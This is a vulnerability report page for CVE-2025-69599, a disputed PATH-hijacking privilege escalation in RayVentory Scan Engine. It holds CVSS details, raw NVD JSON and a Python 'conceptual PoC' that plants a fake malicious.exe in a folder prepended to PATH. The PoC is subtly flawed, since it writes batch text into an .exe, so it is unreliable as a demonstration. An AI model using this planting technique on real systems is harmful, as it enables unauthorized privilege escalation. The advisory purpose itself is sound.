Security Vulnerability Report
中文
CVE-2025-69599 CVSS 9.8 CRITICAL

CVE-2025-69599

Published: 2026-05-08 07:16:29
Last Modified: 2026-05-11 20:25:41

Description

RayVentory Scan Engine through 12.6 Update 8 allows attackers to gain privileges if they control the value of the PATH environment variable. NOTE: this is disputed because ability of an attacker to control the environment is a site-specific misconfiguration.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RayVentory Scan Engine <= 12.6 Update 8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# This is a conceptual PoC for CVE-2025-69599 # The vulnerability relies on manipulating the PATH environment variable. # Prerequisite: Ability to modify PATH or write to a directory in PATH. import os import sys # 1. Create a malicious executable (e.g., a fake 'whoami' or a DLL the target uses) # In a real scenario, this would be a compiled binary or script. malicious_payload_path = "C:\\Temp\\malicious.exe" with open(malicious_payload_path, "w") as f: f.write("@echo off\necho Malicious code executed with high privileges!") # 2. Modify the PATH environment variable # Prepend the directory containing the malicious payload to the PATH current_path = os.environ.get('PATH', '') new_path = f"C:\\Temp;{current_path}" # In an attack scenario, the attacker would set this globally or for the process context # os.environ['PATH'] = new_path print(f"[*] Attempting to trigger the vulnerability by modifying PATH...") print(f"[*] New PATH (partial): {new_path[:50]}...") print("[*] When the RayVentory Scan Engine service restarts or executes a command, it may run the malicious payload.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69599", "sourceIdentifier": "[email protected]", "published": "2026-05-08T07:16:28.617", "lastModified": "2026-05-11T20:25:41.117", "vulnStatus": "Awaiting Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "RayVentory Scan Engine through 12.6 Update 8 allows attackers to gain privileges if they control the value of the PATH environment variable. NOTE: this is disputed because ability of an attacker to control the environment is a site-specific misconfiguration."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://github.com/Wise-Security/CVE-2025-69599", "source": "[email protected]"}, {"url": "https://support.raynet.de/hc/en-us/articles/19518792826132-RVY200865-RayVentory-12-6", "source": "[email protected]"}, {"url": "https://github.com/Wise-Security/CVE-2025-69599", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}